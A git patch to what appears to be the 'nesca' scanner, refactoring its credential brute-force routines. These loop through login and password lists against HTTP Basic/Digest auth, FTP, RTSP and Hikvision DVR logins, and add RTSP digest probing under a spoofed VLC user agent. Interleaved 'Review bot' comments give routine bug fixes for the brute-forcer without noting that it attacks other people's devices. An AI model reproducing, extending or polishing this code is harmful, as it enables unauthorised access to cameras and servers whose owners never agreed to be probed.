From 536342b6f4b6f53ce6c659a3d02d93a32439a487 Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 28 Feb 2016 19:07:10 +0300 Subject: [PATCH] - --- BasicAuth.cpp | 61 ++++++------ Connector.cpp | 221 +++++++++++++++++++++----------------------- Connector.h | 5 +- FTPAuth.cpp | 40 ++------ FileUpdater.cpp | 44 +++------ HikvisionLogin.cpp | 85 +++++------------ IPCAuth.cpp | 89 +++++++++--------- MainStarter.cpp | 6 +- SSHAuth.cpp | 50 ++-------- Utils.cpp | 36 ++++++-- Utils.h | 6 +- WebformWorker.cpp | 26 +----- finder.cpp | 183 ++++++++++++++++++++++-------------- mainResources.h | 27 +++--- nesca_3.cpp | 131 ++++++++++---------------- nesca_3.h | 2 +- nesca_3.ui | 56 ++++++----- progressbardrawer.h | 2 +- version | 2 +- 19 files changed, 477 insertions(+), 595 deletions(-) diff --git a/BasicAuth.cpp b/BasicAuth.cpp index 7a38169..d44bfc2 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -90,6 +90,10 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) int sz = con.nConnect(ipOrig, port, &buff); + if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) { + return lps; + } + char ip[256] = { 0 }; if (sz == 0) { @@ -124,6 +128,11 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) } int isDig = Utils::isDigest(&buff); + if (-2 == isDig) { + QString ipString = QString(ip); + stt->doEmitionFoundData("404 not found - " + ipString + ""); + return lps; + } if (isDig == -1) { if (performDoubleCheck) { Sleep(gTimeOut); 
@@ -157,26 +166,31 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) return lps; } + char login[32] = { 0 }; + char pass[32] = { 0 }; for(int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); if (!globalScanFlag) return lps; - lpString = string(loginLst[i]) + ":" + string(passLst[j]); + strcpy(pass, passLst[j]); + + lpString = string(login) + ":" + string(pass); Connector con; res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode); - if (res == -2) return lps; + if (res == -2) { + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex); + + return lps; + } else if (res != -1) { res = checkOutput(&buffer, ip, port); if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "404"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "404"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex); strcpy(lps.other, "404"); return lps; } 
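Review bot: The new `login[32]` and `pass[32]` buffers in `BA::BABrute` are filled with unbounded `strcpy` from `loginLst[i]` and `passLst[j]`, so nothing in this loop stops an entry longer than 31 characters from running past the stack buffer. The loader in FileUpdater.cpp reads with `fgets(buffFG, 32, ...)`, which presumably keeps entries short enough today, but that coupling is implicit and is not checked here. A bounded copy makes the limit local: `snprintf(login, sizeof(login), "%s", loginLst[i]);`, and the same for `pass`. The same pattern appears where this commit shrinks `login` from 128 to 32 bytes in FTPAuth.cpp and `login`/`pass` from 64 to 32 bytes in `hikLogin` and `rviLogin` in HikvisionLogin.cpp. BABrute starts and ends outside this hunk.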
@@ -185,42 +199,21 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) break; } if (res == 1) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); + strcpy(lps.login, login); + strcpy(lps.pass, pass); return lps; }; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(loginLst[i]) + ":" + QString(passLst[j]), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(50); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } diff --git a/Connector.cpp b/Connector.cpp index 024c2f0..e3917a3 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -99,10 +99,10 @@ int my_trace(CURL *handle, curl_infotype type, if (type == CURLINFO_HEADER_OUT) { //data[size] = '\0'; //Activity += strlen(data); + data[size] = '\0'; QString qData = QString(data); Activity += qData.length(); stt->doEmitionAddOutData(qData); - data[0] = '\0'; } //else if (type == CURLINFO_HEADER_IN) { // QString qData = QString(data); 
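Review bot: In `my_trace` (Connector.cpp), the added `data[size] = '\0';` writes one byte past the `size` bytes libcurl hands to the debug callback; that buffer belongs to libcurl and is not NUL-terminated. Build the string from the explicit length and leave the buffer untouched: `QString qData = QString::fromLatin1(data, static_cast<int>(size));`. The rest of the signature and body are outside the hunk, so this assumes `data` and `size` are the callback's usual `char *data, size_t size` parameters.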
@@ -164,6 +164,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_easy_setopt(curl, CURLOPT_HEADER, 1L); curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); + curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); @@ -208,7 +209,10 @@ int pConnect(const char* ip, const int port, std::string *buffer, int sz = buffer->size(); curl_easy_cleanup(curl); - if (res == CURLE_OK || (port == 21 && sz > 0)) { + + if (res == 35) { + return -1; + } else if (res == CURLE_OK || sz > 0) { return sz; } else if (res == CURLE_LOGIN_DENIED && port == 21) { @@ -270,7 +274,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, return -1; }; } -int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString) +int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool isDigest) { buffer->clear(); int res = 0; @@ -278,7 +282,7 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std: if (curl != NULL) { - //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); if (MapWidgetOpened) { struct data config; config.trace_ascii = 1; /* enable ascii tracing */ 
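Review bot: `CURLOPT_SSL_VERIFYSTATUS` already defaults to `0L`, so the line added in `pConnect` has no effect, while the two context lines below it turn off peer and host verification for every HTTPS transfer on this handle. With those off the peer's identity is never checked, so anything read into `buffer` and anything sent on the connection can be observed or altered by whoever terminates the TLS session. If that is deliberate, say so once above the three options, e.g. `// certificate validation is intentionally disabled; responses are unauthenticated`, and drop the redundant line.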
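Review bot: `if (res == 35)` in `pConnect` hides which error is meant; libcurl names it, so write `if (res == CURLE_SSL_CONNECT_ERROR)` in line with the `CURLE_OK` and `CURLE_LOGIN_DENIED` comparisons next to it. The widened `res == CURLE_OK || sz > 0` also returns a length for any transfer that failed after receiving some bytes, so callers can no longer tell a truncated response from a complete one; a short comment on why partial data is acceptable for every port would help. The error-handling chain continues past the end of this hunk.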
@@ -287,124 +291,41 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std: curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } - char newIP[128] = {0}; - strcpy(newIP, "rtsp://"); - strncat(newIP, ip, 96); - strcat(newIP, "/ch1/main"); - /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L); - y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L); - y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/ - //curl_easy_setopt(curl, CURLOPT_URL, newIP); - //curl_easy_setopt(curl, CURLOPT_PORT, port); - curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP); - //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); - //int y = curl_easy_setopt(curl, CURLOPT_URL, ip); - //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); - //curl_easy_setopt(curl, CURLOPT_PORT, port); - /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); - res = curl_easy_perform(curl); - y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/ - res = curl_easy_perform(curl); - - //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE); - //curl_easy_setopt(curl, CURLOPT_USERAGENT, - // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); - //curl_easy_setopt(curl, CURLOPT_HEADER, 1L); - //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); - //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); - //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); - //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); - //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); - //int proxyPort = std::atoi(gProxyPort); - //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); - ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); - //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); - //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); - - //if (lpString != 
NULL) { - // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); - // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); - // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); - // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); - // res = curl_easy_perform(curl); - // /*if (digestMode) - // { - // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); - // res = curl_easy_perform(curl); - - // if (port != 21 && lpString != NULL) { - // int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); - // if (pos != -1) { - // *buffer = buffer->substr(pos + 4); - // } - // } - // } - // else res = curl_easy_perform(curl);*/ - //} - //else res = curl_easy_perform(curl); - - int sz = buffer->size(); - - curl_easy_cleanup(curl); - if (res == CURLE_OK || (port == 21 && sz > 0)) { - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - Activity += sz; - return sz; - } - else if (res == CURLE_LOGIN_DENIED && port == 21) { - return -1; - } - else if (res == CURLE_OPERATION_TIMEDOUT - || res == CURLE_COULDNT_CONNECT - || res == CURLE_SEND_ERROR - || res == CURLE_RECV_ERROR - ) { - SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - shutdown(eNobuffSocket, SD_BOTH); - closesocket(eNobuffSocket); - if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) { - stt->doEmitionRedFoundData("Insufficient buffer/memory space. 
Sleeping for 10 sec..."); - Sleep(10000); - } - return -1; + curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); + curl_easy_setopt(curl, CURLOPT_USERAGENT, + "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); + curl_easy_setopt(curl, CURLOPT_URL, ip); + curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); + curl_easy_setopt(curl, CURLOPT_HEADER, 1L); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); + int proxyPort = std::atoi(gProxyPort); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + if (isDigest) { + curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); } else { - if (res == 6) return -2; - else if (res != 13 && - res != 67 && - res != 52 && - res != 56 && - res != 35 && - res != 19 && - res != 23) - { - if (res == 5) { - stt->doEmitionRedFoundData("The given proxy host could not be resolved."); - return -2; - } - else if (res == 8) { - stt->doEmitionFoundData("Strange ftp reply. 
(" + - QString::number(res) + ") " + QString(ip)); - return -2; - } - else if (res == 18) { - return -2; - } - else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip)); - }; + curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC); + } + curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); + res = curl_easy_perform(curl); + + int sz = buffer->size(); + curl_easy_cleanup(curl); + + if (res == CURLE_OK || sz > 0) { return sz; } - - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - - return sz; - } - else { - stt->doEmitionRedFoundData("Curl error."); + return -1; - }; + } + + stt->doEmitionRedFoundData("Curl error."); + return -1; } void eraser(std::string *buffer, const std::string delim1, const std::string delim2) { @@ -430,14 +351,14 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, const std::vector *customHeaders, const std::string *lpString, bool digestMode, - bool isRTSP){ + bool isRTSP, bool isDigest){ int res = 0; if (!isRTSP) { res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode); } else { - res = pConnectRTSP(ip, port, buffer, lpString); + res = pConnectRTSP(ip, port, buffer, lpString, isDigest); } cutoutComments(buffer); 
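Review bot: `curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());` in the rewritten `pConnectRTSP` dereferences `lpString` unconditionally, yet `Connector::nConnect` declares that parameter with a default of `NULL` (Connector.h) and forwards it unchanged, so an RTSP call made without credentials is a null dereference. Guard it: `if (lpString != NULL) curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());`. Separately, `CURLOPT_RTSP_REQUEST` takes a `long` through a variadic call, so pass `(long)CURL_RTSPREQ_DESCRIBE` as the removed commented-out code did. The function opens in an earlier hunk.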
@@ -447,6 +368,67 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, return res; } +int Connector::checkIsDigestRTSP(const char *ip, std::string *buffer) { + + buffer->clear(); + int res = 0; + CURL *curl = curl_easy_init(); + + if (curl != NULL) + { + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); + if (MapWidgetOpened) { + struct data config; + config.trace_ascii = 1; /* enable ascii tracing */ + curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); + curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); + curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); + } + + curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); + curl_easy_setopt(curl, CURLOPT_USERAGENT, + "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); + curl_easy_setopt(curl, CURLOPT_URL, ip); + curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); + curl_easy_setopt(curl, CURLOPT_HEADER, 1L); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); + int proxyPort = std::atoi(gProxyPort); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + + res = curl_easy_perform(curl); + + int sz = buffer->size(); + + curl_easy_cleanup(curl); + if (res == CURLE_OK || sz > 0) { + if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); + Activity += sz; + + if (Utils::ustrstr(buffer, "200 ok") != -1) { + return 2; + } + else if (Utils::ustrstr(buffer, "not found") != -1) { + return -1; + } + else if (Utils::ustrstr(buffer, "digest") != -1) { + return 1; + } + else { + return 0; + } + } + + return -1; + } + + stt->doEmitionRedFoundData("Curl error."); + return -1; +} + bool portCheck(const char * sDVRIP, int wDVRPort) { // sockaddr_in sa; // sa.sin_family = AF_INET; 
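Review bot: In `Connector::checkIsDigestRTSP`, `struct data config` is declared inside the `if (MapWidgetOpened)` block and its address is given to `CURLOPT_DEBUGDATA`, but the block closes before `curl_easy_perform` runs, so libcurl is left holding a pointer to an object whose lifetime has ended. Declare it at function scope next to `int res = 0;`, i.e. `struct data config; config.trace_ascii = 1;`, and keep only the `curl_easy_setopt` calls inside the `if`. Whether `my_trace` reads that pointer is not visible here, and the same scoping appears in `pConnectRTSP`. The request setup is also a near copy of `pConnectRTSP`; a shared helper would keep the two from drifting apart.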
@@ -581,6 +563,9 @@ int Connector::connectToPort(char* ip, int port) //strcpy(tempIp, "ftp://"); sprintf(tempIp, "ftp://%s:%d", ip, port); } + /*else if (554 == port) { + sprintf(tempIp, "rtsp://%s:%d", ip, port); + }*/ else { //strcpy(tempIp, "http://"); sprintf(tempIp, "http://%s:%d", ip, port); diff --git a/Connector.h b/Connector.h index d663440..299371f 100644 --- a/Connector.h +++ b/Connector.h @@ -8,7 +8,7 @@ #include #include #pragma comment(lib, "iphlpapi.lib") -#pragma comment(lib,"curllib.lib") +//#pragma comment(lib,"libcurldll.a") #endif #include @@ -39,7 +39,8 @@ public: const std::vector *customHeaders = NULL, const std::string *lpString = NULL, bool digestMode = false, - bool isRTSP = false); + bool isRTSP = false, bool isDigest = true); int connectToPort(char *ip, int port); + int checkIsDigestRTSP(const char *ip, std::string *buffer); }; #endif // CONNECTOR_H diff --git a/FTPAuth.cpp b/FTPAuth.cpp index 969f4ea..777c0d0 100644 --- a/FTPAuth.cpp +++ b/FTPAuth.cpp @@ -19,9 +19,8 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { int passCounter = 0; int rowIndex = -1; - char login[128] = {0}; + char login[32] = {0}; char pass[32] = {0}; - //char nip[128] = { 0 }; for (int i = 0; i < MaxFTPLogin; ++i) { @@ -37,18 +36,12 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { strcpy(pass, ftpPassLst[j]); if (strlen(pass) <= 1) continue; - lpString = string(login) - + string(pass); + lpString = string(login) + string(pass); Connector con; res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString); if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } else if (res != -1) { 
@@ -57,39 +50,18 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { strcpy(lps.pass, pass); ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n'); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; }; - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(50); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } diff --git a/FileUpdater.cpp b/FileUpdater.cpp index 47dbecf..4801b49 100644 --- a/FileUpdater.cpp +++ b/FileUpdater.cpp @@ -55,8 +55,7 @@ void updateLogin() { while(fgets(buffFG, 32, loginList) != NULL) { MaxLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(loginList); 
@@ -75,8 +74,7 @@ void updateLogin() { if(strstr(buffFG, "\n") != NULL) strncat(loginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(loginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldLoginLstSize == 0) stt->doEmitionGreenFoundData("Login list loaded (" + QString::number(MaxLogin) + " entries)"); @@ -110,8 +108,7 @@ void updatePass() { while(fgets(buffFG, 32, passList) != NULL) { MaxPass++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(passList); @@ -130,8 +127,7 @@ void updatePass() { if(strstr(buffFG, "\n") != NULL) strncat(passLst[i++], buffFG, strlen(buffFG) - 1); else strncat(passLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldPassLstSize == 0) stt->doEmitionGreenFoundData("Password list loaded (" + QString::number(MaxPass) + " entries)"); @@ -157,7 +153,6 @@ void updateSSH() { MaxSSHPass = 0; char buffFG[32] = {0}; - //ZeroMemory(buffFG, sizeof(buffFG)); FILE *sshlpList = fopen(SSH_PASS_FN, "r"); @@ -166,7 +161,7 @@ void updateSSH() { while(fgets(buffFG, 32, sshlpList) != NULL) { ++MaxSSHPass; - //ZeroMemory(buffFG, sizeof(buffFG)); + ZeroMemory(buffFG, sizeof(buffFG)); buffFG[0] = 0; }; @@ -186,8 +181,7 @@ void updateSSH() { if(strstr(buffFG, "\n") != NULL) strncat(sshlpLst[i++], buffFG, strlen(buffFG) - 1); else strncat(sshlpLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldSSHLstSize == 0) stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString::number(MaxSSHPass) + " entries)"); 
@@ -221,8 +215,7 @@ void updateWFLogin() { while(fgets(buffFG, 32, wfLoginList) != NULL) { MaxWFLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(wfLoginList); @@ -241,8 +234,7 @@ void updateWFLogin() { if(strstr(buffFG, "\n") != NULL) strncat(wfLoginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(wfLoginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldWFLoginLstSize == 0) stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString::number(MaxWFLogin) + " entries)"); @@ -271,8 +263,7 @@ void updateWFPass() { while(fgets(buffFG, 32, wfPassList) != NULL) { MaxWFPass++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(wfPassList); @@ -291,8 +282,7 @@ void updateWFPass() { if(strstr(buffFG, "\n") != NULL) strncat(wfPassLst[i++], buffFG, strlen(buffFG) - 1); else strncat(wfPassLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldWFPassLstSize == 0) stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString::number(MaxWFPass) + " entries)"); @@ -321,8 +311,7 @@ void updateFTPLogin() { while (fgets(buffFG, 32, ftpLoginList) != NULL) { MaxFTPLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(ftpLoginList); @@ -341,8 +330,7 @@ void updateFTPLogin() { if (strstr(buffFG, "\n") != NULL) strncat(ftpLoginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(ftpLoginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if (FileUpdater::oldFTPLoginLstSize == 0) stt->doEmitionGreenFoundData("FTP login list loaded (" + QString::number(MaxFTPLogin) + " entries)"); 
@@ -371,8 +359,7 @@ void updateFTPPass() { while (fgets(buffFG, 32, ftpPassList) != NULL) { ++MaxFTPPass; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(ftpPassList); @@ -391,8 +378,7 @@ void updateFTPPass() { if (strstr(buffFG, "\n") != NULL) strncat(ftpPassLst[i++], buffFG, strlen(buffFG) - 1); else strncat(ftpPassLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if (FileUpdater::oldFTPPassLstSize == 0) stt->doEmitionGreenFoundData("FTP password list loaded (" + QString::number(MaxFTPPass) + " entries)"); @@ -422,7 +408,7 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) { void FileUpdater::updateLists() { running = true; while(globalScanFlag) { - Sleep(600000); + Sleep(1000); if(!globalScanFlag) break; loadOnce(); } diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp index 9f5e77c..35c8793 100644 --- a/HikvisionLogin.cpp +++ b/HikvisionLogin.cpp @@ -349,7 +349,7 @@ bool HikVis::checkSAFARI(const char * sDVRIP, int port) { return false; } - +#include "Utils.h" lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) { lopaStr lps = { "UNKNOWN", "", "" }; @@ -358,18 +358,15 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) strcpy(ip, sDVRIP); int rowIndex = -1; - char login[64] = { 0 }; - char pass[64] = { 0 }; + char login[32] = { 0 }; + char pass[32] = { 0 }; for (int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); if (!globalScanFlag) return lps; - /*ZeroMemory(login, 64); - ZeroMemory(pass, 64);*/ - login[0] = 0; - pass[0] = 0; - strcpy(login, loginLst[i]); strcpy(pass, passLst[j]); NET_DVR_DEVICEINFO_V30 *info = 0; 
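Review bot: `#include "Utils.h"` is added in the middle of HikvisionLogin.cpp, directly above `HikVis::hikLogin`, and the same line is added again above `HikVis::rviLogin` in a later hunk. Put a single `#include "Utils.h"` with the other includes at the top of the file, so the dependency is visible in one place and the second copy does not depend on the header's include guard.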
@@ -380,39 +377,20 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) strcpy(lps.login, login); strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } - + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); + return lps; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else{ rowIndex = -1; } + 